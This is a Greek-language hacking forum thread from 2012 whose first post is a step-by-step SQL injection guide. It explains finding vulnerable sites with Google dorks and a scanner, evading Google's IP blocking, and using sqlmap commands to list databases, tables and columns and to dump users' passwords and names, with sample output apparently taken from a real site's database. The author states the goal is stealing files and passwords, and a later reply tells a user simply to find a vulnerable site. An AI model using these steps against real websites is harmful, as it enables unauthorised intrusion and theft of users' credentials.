[GR]SQL Injection -Guide Part 1+2

~Grey Hat~ · May 21, 2012

Eiσαγωγη

Καλησπερα σε ολα τα μελη και χαιρομαι που σας βρισκω μιας και ειναι το πρωτο μου ποστ στο section!

Οπως γραφει και στον τιττλο σημερα θα σας δειξω πως κανω εγω sql injection σε μια ιστοσελιδα και υποκλεπτω αρχεια ,κωδικους κτλπ.!

Tι θα χρειαστουμε?

Για να γινει αυτο θα χρειαστουμε λειτουργικο συστημα BackTrack R1!Eιναι λειτουργικο συστημα των Linux!Μη φοβαστε δεν χρειαζεται να βγαλετε τα windows σας η οτι αλλο χρησημοποιειτε!Θα ανεβασω αργοτερα ενα guide για το πως θα το τρεξετε!

Αρχικα πρεπει να βρουμε αν η σελιδα ειναι ευαλωτη σε επιθεσεις, για να το κανουμε αυτο θα χρειαστουμε καποιο προγραμμα! Παρακατω εχω 2 link με τετοια προγραμματα!

Downloads

Dork

XCodeExploitScanner

Πληροφοριες

Συνεχιζω...εκει που λεει Dork βαζετε τι τυπο σελιδας θελετε να ψαξει πχ αν θελετε για προιοντα inurl:product.php?mid= (θα σας βρει καποια που να σχετιζονται με προιοντα οχι ολα απλα ειναι ενας τροπος για να διαλεξεις που θα επιτεθεις) πατας dork it και σου εμφανιζει σελιδες,μετα Scan SQLi και ανιχνευει αν οι σελιδες ειναι ευαλωτες πατατε στο Open results καντε αντιγραφη και καντε επικολληση σε ενα αρχειο text το οποιο θα μπορειτε να το κοιταξετε μετα με Backtrack

περιπου καθε μια αναζητηση που κανετε πρεπει να πατατε Show Captcha να βαζετε οτι βλεπετε στην εικονα ετσι ωστε να μην μπλοκαρει την ip σας η Google..

Ξεκινωντας Την Διαδικασια

Λοιπον Ανοιγουμε ενα τερματικο στο backtrack και γραφουμε

cd /pentest/database/sqlmap

,ωστε να ενεργοποιησουμε το sqlmap.Μετα γραφουμε

./sqlmap.py -u [ url ]--beep

πχ

./sqlmap.py -u http://www.selidathyma.com --beep

Οταν ακουσετε ενα beep τοτε το sqlmap βρηκε ευαλωτη την σελιδα.Συνεχιζω εδω...μετα γραφουμε

./sqlmap.py -u [ url ] --dbs

π.χ

./sqlmap.py -u http://www.selidathyma.com --dbs

θα μας εμφανισει τα Database πχ

available databases [6]:

[*] dswa

[*] dswa_stage

[*] dswawordpress

[*] information_schema

[*] mysql

[*] test

./sqlmap.py -u [ url ] --tables -D [database]

μπορειτε να επιλεξετε οτι database θελετε και γραφετε παλι

πχ

./sqlmap.py -u http://www.selidathyma.com --tables -D dswa

Database: dswa

[table]

[tr]

[td][104 tables]

+-----------------------------------+

| access

| accesslog

| actions

| actions_aid

| advanced_help_index

| authmap

| autologout

| batch

| blocks

| blocks_roles

| boxes

| cache

| cache_block

| cache_content

| cache_filter

| cache_form

| cache_menu

| cache_page

| cache_update

| cache_views

| cache_views_data

| comments

| content_access

| content_field_headername

| content_group

| content_group_fields

| content_node_field

| content_node_field_instance

| content_type_education_center_sub

| content_type_find_alliance

| content_type_member_home_page

| content_type_member_page

| content_type_page

| content_type_page_ns

| content_type_story

| dswa_chapters_main

| dswa_chapters_persons

| dswa_eventuity_additional

| dswa_eventuity_link

| dswa_eventuity_main

| dswa_profile_additional

| dswa_profile_geographic

| dswa_profile_images

| dswa_profile_main

| dswa_store_categories

| dswa_store_featured

| dswa_store_featured_sample

| dswa_store_images

| dswa_store_product_categories

| dswa_store_products

| dswa_taq_articles

| dswa_taq_quotes

| dswa_taq_tips

| dswa_taq_topics

| dswa_teleclasses_additional

| dswa_teleclasses_main

| dswa_teleclasses_speakers

| dswa_whatsnew_main

| dswa_whatsnew_order

| fckeditor_role

| fckeditor_settings

| files

| filter_formats

| filters

| flood

| history

| menu_custom

| menu_links

| menu_router

| node

| node_access

| node_comment_statistics

| node_counter

| node_revisions

| node_type

| performance_detail

| performance_summary

| permission

| profile_fields

| profile_values

| role

| search_dataset

| search_index

| search_node_links

| search_total

| semaphore

| sessions

| system

| term_data

| term_hierarchy

| term_node

| term_relation

| term_synonym

| upload

| url_alias

| users

| users_roles

| variable

| views_display

| views_object_cache

| views_view

| vocabulary

| vocabulary_node_types

| watchdog[/td]

[/tr]

[/table]

./sqlmap.py -u [ url ] --columns -T [table name] -D [databasename]

Παραδειγμα

./sqlmap.py -u http://www.selidathyma.com --columns -T user -D dswa

Και αρχιζει βγαζει τους users...Αλλο παραδειγμα..

./sqlmap.py -u [ url ] --dump -C [column] -T [table name] -D [databasename]

πχ

./sqlmap.py -u http://www.selidathyma.com --dump  -C pass -T users -D dswa

πχ εγω τωρα στοχευσα να επιτεθω και να ανακτησω ολους τους κωδικους απο τα μελη που ειναι γραμμενα στην σελιδα <~~~ τσεκαρετε μια να δειτε.

π.χ

./sqlmap.py -u http://www.selidathyma.com --dump  -C name -T users -D dswa

, και εδω τα ονοματα που εκαναν εγγραφη σε αυτη την σελιδα ~~~>

Και ετσι μπορεις να υποκλεψεις στοιχεια απο διαφορες σελιδες..Τα παραπανω χρησημοποιηθηκαν σε δικο μου συστημα..Αυτος ο οδηγος ειναι παρανομος δεν ευθυνομαι για κακοβουλη χρηση του *ΠΡΟΣΟΧΗ μπορουνε να σας εντοπισουνε και να διωχθειτε ποινικα αν επιτεθειτε σε σελιδα.

Ερχονται καλυτερα ποστ !Ευχαριστω

~Grey Hat~ · May 23, 2012

bump

Voqus · May 23, 2012

Ρε φιλε γιατι στον πεοντα κανεις bump εισαι σε tutorial section οχι request.

Εαν ενδιαφερεται καποιος hacking θα κανει reply εδω η θα σε κανει pm.

Jesus.

~Grey Hat~ · May 23, 2012

Κανω για να ανεβουν λιγο τα ποστ και να επισκεπτοντε περισσοτεροι το section..

sτrίkε- · May 24, 2012

Κανω για να ανεβουν λιγο τα ποστ και να επισκεπτοντε περισσοτεροι το section..

Αραξε λιγο φιλαρακο.

Σε καταλαβαινω οτι θελεις να ανεβει το section οπως θα το θελα και εγω, μα με αυτο π κανεις τωρα σκεψου οτι οταν ανεβει θα υπαρχουν αρκετα σχολια του τυπου bump.

~Grey Hat~ · May 24, 2012

Αραξε λιγο φιλαρακο.

Σε καταλαβαινω οτι θελεις να ανεβει το section οπως θα το θελα και εγω, μα με αυτο π κανεις τωρα σκεψου οτι οταν ανεβει θα υπαρχουν αρκετα σχολια του τυπου bump.

Ok ηταν λαθος! Δεν θα ξαναγινει..Να σου πω , καποιος παιζει με το reputation μου :/ πριν ειχα 1 τωρα 0 ..και νομιζω ξερω ποιος μου το αλλαξε και γιατι...

Celebron · May 24, 2012

Ok ηταν λαθος! Δεν θα ξαναγινει..Να σου πω , καποιος παιζει με το reputation μου :/ πριν ειχα 1 τωρα 0 ..και νομιζω ξερω ποιος μου το αλλαξε και γιατι...

http://maxcheaters.com/forum/index.php?action=viewkarma

Elfo who else? :S

~Grey Hat~ · May 24, 2012

http://maxcheaters.com/forum/index.php?action=viewkarma

Elfo who else? :S

Ευχαριστω φιλε..Τι να πεις..!

Celebron · May 24, 2012

Ευχαριστω φιλε..Τι να πεις..!

Egw kai esu? tipota allos prepei na pei ... ekanan ena hacking sections kai apagorevonte ta dos otinane :/

Btw reported : http://maxcheaters.com/forum/index.php?topic=240156.

~Grey Hat~ · June 4, 2012

bump

UnSponsored · November 11, 2012

ginete kai gia l2 database?

~Grey Hat~ · December 8, 2012

ginete kai gia l2 database?

ennoeite..arkei na vreis vulverable site

maxcheaterz · March 14, 2013

Thanks

[GR]SQL Injection -Guide Part 1+2

Recommended Posts

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Link to comment

Share on other sites

Please sign in to comment

Posts

Topics